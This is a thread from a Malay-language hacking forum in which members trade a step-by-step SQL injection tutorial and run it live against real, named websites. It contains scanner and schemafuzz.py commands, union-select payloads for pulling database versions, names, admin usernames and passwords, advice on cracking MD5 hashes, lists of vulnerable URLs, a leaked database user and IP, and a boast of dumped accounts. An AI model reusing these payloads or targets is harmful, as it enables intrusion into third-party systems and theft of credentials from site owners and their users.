Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[BAT]Auto Easy Sqli Vuln Finder
28-02-2010, 01:25 PM, (This post was last modified: 28-02-2010, 02:15 PM by tau9eh.)
Post: #16
RE: [BAT]Auto Easy Sqli Vuln Finder
yup..aku install php yg ko bagi la..
aku dah repair balik...
dah dah jadi dah Big Grin

http://www.mondopop.it/news_view.php?id=38'
http://www.mondopop.it/news_view.php?id=31'
http://www.digitech.com/news_view.php?id=53'
http://www.digitech.com/news_view.php?id=55'
http://www.ufwda.org/news_view.php?id=165'
http://www.ufwda.org/news_view.php?id=165'
http://www.ufwda.org/news_view.php?id=70'
http://www.bssaudio.com/news_view.php?id=30'
http://www.bssaudio.com/news_view.php?id=24'
http://www.chalklineband.org/news_view.php?id=1'

hehehhe..lepastuh ape aku nk buat yek untuk hack site nieBig Grin????
Reply
28-02-2010, 01:28 PM, (This post was last modified: 28-02-2010, 01:31 PM by mrlock.)
Post: #17
RE: [BAT]Auto Easy Sqli Vuln Finder
search tbd ni sqli hack
pastu blaja la Big Grin
yang nie aku tulis sendiri Big Grin
Code:
#######################################################################################
#                                SQli Step By Step                                    #                
#                                 [Malay Version]                                     #              
#                           Created By Haikalxy a.k.a Mr.Lock                         #
#                       Thanks to wanbotak,XshimeX, and all tbd crewz                 #
#######################################################################################


**********guner sqliscanner.php untuk cari list vuln to sqli***************************
command :
cd c:\program files\php
php.exe c:\sqliscanner.php

########################################################################################
**************pastu guner schemafuzz.py untuk cari id yg tempat error tu lepak**********
command :
c:\schemafuzz.py
c:\schemafuzz.py -u "www.websiteape.com/index.php?id=12" --findcol

########################################################################################
******dah dapat tempat error tu lepak bukak link tu guner browser dan lihat nombor aper yg kuar &
cari version aper pulak*******
guna : version() atau @@version letak di nombor yg keluar tadi
eg:
5
command :
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,version(),6,7,8,9--
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,@@version,6,7,8,9--

########################################################################################
*********************************pastu cari name database die****************************
guna : database()
command :
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,database(),6,7,8,9--
eg :
kucing12

##########################################################################################
*********dah dapat name database guner schemafuzz.py pulak untuk fuzz database dier*******
command :
c:\schemafuzz.py -u "www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,darkc0de,6,7,8,9--" -D kucing12 --fuzz
eg :
find table "admin"
column "username"
column "pass"
column "id"

##########################################################################################
*********************************pastu guner link tadi dan *******************************
letak nama column kat  darkcode dan tambah from nama table
eg :
untuk cari username
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,username,6,7,8,9 from admin
untuk cari password
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,pass,6,7,8,9 from admin
result :
username :admin
password :4ccess4all
kalau
username :admin
password :6514684s84fs5648648s <----[kalo password camnie korang crack md5 password nie kat mane md5 cracker site ataupun guner md5 brutehash perl kalo x jumper pass kat site cracker tu]

##########################################################################################
**********************guner admin page finder untuk cari admin login page ****************

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
28-02-2010, 01:32 PM,
Post: #18
RE: [BAT]Auto Easy Sqli Vuln Finder
mr lock.. ko kena sediakan manual penggunaan dia sekali.. kalau x para n00b mmg payah nak belajar.. kalau dah ada manual leh sound "PLZ RTFM 1st!" Big Grin
Reply
28-02-2010, 01:34 PM,
Post: #19
RE: [BAT]Auto Easy Sqli Vuln Finder
hehe..aku malas la Big Grin
ko la yang wat Big Grin~~
heeeeee

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
28-02-2010, 01:34 PM,
Post: #20
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 01:32 PM)sil Wrote: mr lock.. ko kena sediakan manual penggunaan dia sekali.. kalau x para n00b mmg payah nak belajar.. kalau dah ada manual leh sound "PLZ RTFM 1st!" Big Grin

Define:PLZ RTFM 1ST! : Please read the fucking manual first!

betulkan ?

Trimas masts sil ngn masta mrlock ; )
"You're what you achieve. Therefore be the man you wanted to be."
Reply
28-02-2010, 01:39 PM, (This post was last modified: 28-02-2010, 01:39 PM by mrlock.)
Post: #21
RE: [BAT]Auto Easy Sqli Vuln Finder
@hellxox
ko la masta Big Grin

mr lock noob Sad

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
28-02-2010, 01:48 PM, (This post was last modified: 28-02-2010, 01:48 PM by tau9eh.)
Post: #22
RE: [BAT]Auto Easy Sqli Vuln Finder
site nie sampai 20 aku try..error dier x ilang pom--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

biasa korang buat sampai berapa??
Reply
28-02-2010, 01:50 PM,
Post: #23
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 01:48 PM)tau9eh Wrote: site nie sampai 20 aku try..error dier x ilang pom--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

biasa korang buat sampai berapa??

40 - 150 . lama tak sqli Sad
"You're what you achieve. Therefore be the man you wanted to be."
Reply
28-02-2010, 01:57 PM,
Post: #24
RE: [BAT]Auto Easy Sqli Vuln Finder
dah sampai 100 dah nie x kan la x ilang lagi..
Reply
28-02-2010, 02:14 PM,
Post: #25
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 01:48 PM)tau9eh Wrote: site nie sampai 20 aku try..error dier x ilang pom--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

biasa korang buat sampai berapa??


Sql231921@62.149.141.123 : Sql231921_1 : 5.0.82sp1-log

tool tanpa pengetahuan = skiddies
tool + pengetahuan = u feel the different
Reply
28-02-2010, 02:14 PM, (This post was last modified: 28-02-2010, 02:15 PM by mrlock.)
Post: #26
RE: [BAT]Auto Easy Sqli Vuln Finder
kalo malas nak +order+by+
guner schemafuzz.py
command
c:\schemafuzz.py -u "www.websitesqli.com/index.php?id=56" --findcol
nnti die automatik cari ;)
@ahls.
biler masta nak turunkan ilmu Big Grin
waiting nie Big Grin

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
28-02-2010, 02:19 PM,
Post: #27
RE: [BAT]Auto Easy Sqli Vuln Finder
http://www.mondopop.it/news_view.php?id=...6,7,8,9,10
Reply
28-02-2010, 02:27 PM, (This post was last modified: 28-02-2010, 02:30 PM by tau9eh.)
Post: #28
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 02:14 PM)Ahlspiess Wrote:
(28-02-2010, 01:48 PM)tau9eh Wrote: site nie sampai 20 aku try..error dier x ilang pom--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

biasa korang buat sampai berapa??


Sql231921@62.149.141.123 : Sql231921_1 : 5.0.82sp1-log

tool tanpa pengetahuan = skiddies
tool + pengetahuan = u feel the different
Sql231921@62.149.141.123 : Sql231921_1 : 5.0.82sp1-log <--ape benda nie??

baru nk blaja la..

(28-02-2010, 02:14 PM)mr lock Wrote: kalo malas nak +order+by+
guner schemafuzz.py
command
c:\schemafuzz.py -u "www.websitesqli.com/index.php?id=56" --findcol
nnti die automatik cari ;)
@ahls.
biler masta nak turunkan ilmu Big Grin
waiting nie Big Grin

kejap...nanti aku tnya pasal schemafuzz.py
aku jumpa site baik punyer.. Big Grin

http://www.comprousa.com/en/news_view.ph...lect+1,2,3--

tapi bila aku cek version dier mcm nie..

http://www.comprousa.com/en/news_view.ph...ersion(),3--


(28-02-2010, 02:19 PM)Ahlspiess Wrote: http://www.mondopop.it/news_view.php?id=...6,7,8,9,10

cepat ko masuk..
share la mcm mana..Big Grin
Reply
28-02-2010, 02:29 PM, (This post was last modified: 28-02-2010, 02:45 PM by mrlock.)
Post: #29
RE: [BAT]Auto Easy Sqli Vuln Finder
bro salah letak version la Big Grin
replace version() dengan no 2 Big Grin
http://www.comprousa.com/en/news_view.ph...on%28%29,3--
yg nie skiddies wat Smile
mondopop.it dumped acount
[Image: 45533282.png]
;)

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
28-02-2010, 03:01 PM,
Post: #30
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 02:29 PM)mr lock Wrote: bro salah letak version la Big Grin
replace version() dengan no 2 Big Grin
http://www.comprousa.com/en/news_view.ph...on%28%29,3--

keh2 mcm tu...thank bro..

.........................................

http://www.comprousa.com/en/news_view.ph...base%28%29--

aku ambik reviews..lpastuh aku convert kat http://piclist.com/techref/ascii.htm

kluar --> 72657669657773

http://www.comprousa.com/en/news_view.ph...7669657773--

[Image: revieww.jpg]
hum...lpastuh ape aku kena buat..pening nie

(28-02-2010, 02:29 PM)mr lock Wrote: yg nie skiddies wat Smile
mondopop.it dumped acount
[Image: 45533282.png]
;)
nie ape benda pulak..??
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  [bat]SQli Finder Vuln Version 2.0 tau9eh 12 4,086 07-03-2010, 12:20 PM
Last Post: tau9eh

Forum Jump: